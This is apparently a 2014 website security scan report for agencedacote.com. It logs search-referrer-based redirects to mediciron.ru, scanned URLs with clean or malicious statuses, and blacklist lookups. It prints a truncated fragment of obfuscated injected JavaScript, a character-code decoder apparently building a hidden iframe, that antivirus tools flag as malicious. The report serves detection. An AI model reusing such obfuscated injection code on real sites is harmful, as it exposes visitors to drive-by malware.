Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://agencedacote.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: agencedacote.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 11 Sep 2014 04:46:24 GMT Location: http://mediciron.ru/ Server: nginx/1.6.1 Content-Length: 270 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://agencedacote.com/ | 200 OK Content-Length: 8699 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function jxrv(){dphjv=function(){--(rbbk.body)}()}ryy="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)yezz=4;rtwrwj=("84,ca,d9,d2,c7,d8,cd,d3,d2,84,d2,94,9d,8c,8d,84,df,71,6e,84,da,c5,d6,84,d7,d8,c5,d8,cd,c7,a1,8b,c5,ce,c5,dc,8b,9f,71,6e,84,da,c5,d6,84,c7,d3,d2,d8,d6,d3,d0,d0,c9,d6,a1,8b,cd,d2,c8,c9,dc,92,d4,cc,d4,8b,9f,71,6e,84,da,c5,d6,84,d2,84,a1,84,c8,d3,c7,d9,d1,c9,d2,d8,92,c7,d6,c9,c5,d8,c9,a9,d0,c9,d1,c9,d2,d8,8c,8b,cd,ca,d6,c5,d1,c9,8b,8d,9f,71,6e,71,6e,84,d2,92,d7,d6,c7,84,a1,84 Antivirus reports:
| ||
http://agencedacote.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 11 Sep 2014 04:46:25 GMT Location: http://mediciron.ru/ Server: nginx/1.6.1 Content-Length: 270 Content-Type: text/html; charset=iso-8859-1 | clean |
http://mediciron.ru/ | 200 OK Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru/modernizr.js | 200 OK Content-Length: 6296 Content-Type: application/javascript | clean |
http://agencedacote.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 302 Found Connection: close Date: Thu, 11 Sep 2014 04:46:26 GMT Location: http://mediciron.ru/ Server: nginx/1.6.1 Content-Length: 270 Content-Type: text/html; charset=iso-8859-1 | clean |
http://mediciron.ru/test404page.js | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 33467 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=agencedacote.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://agencedacote.com/
Result: agencedacote.com is not infected or malware details are not published yet.
Result: agencedacote.com is not infected or malware details are not published yet.